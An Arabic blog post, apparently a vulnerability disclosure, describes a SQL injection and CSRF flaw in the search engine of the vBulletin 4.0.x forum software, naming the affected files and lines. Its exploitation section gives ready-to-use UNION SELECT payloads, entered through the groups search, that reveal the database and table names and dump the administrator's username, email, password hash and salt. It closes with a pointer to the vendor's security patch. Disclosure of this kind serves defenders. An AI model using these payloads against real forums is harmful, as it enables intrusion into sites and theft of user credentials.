(اليوم صفر): ثغرة حقن , CSRF/XSRF في سكريبت المنتديات الشهير Vbulletin تعمل على الإصدار الرابع

 

مقدمة

تم اكتشاف ثغرة  SQL injection  و CSRF/XSRF في برنامج إدارة المحتوى الشهير Vbuuletin في محرك البحث الخاص به.

 

معلومات اختبار الاختراق

نظام التشغيل: جميع أنظمة التشغيل

المنصة: PHP , MySQL

معلومات الثغرة:
البرنامج: http://www.vbulletin.com
الإصدار المصاب: 4.0.x
تكمن التغرة في الملفات محرك البحث و هي
“/vb/search/searchtools.php” في السطر 751
“/packages/vbforum/search/type/socialgroup.php” في السطور 201 إلى 203

الاستغلال:
اذهب إلى محرك البحث , ثم إلى Search Multiple Content Types ثم اختر المجموعات groups
وضع التالي  في محرك البحث
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

 

لمزيد من التفاصيل

SQLi

CSRF/XSRF

 

الحماية:
التحديث الأمني الرسمي من الشركة
vbulletin 4.X Security Batch

تحياتي و احترامي

نبذة عن الكاتب

المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.

أكتب تعليق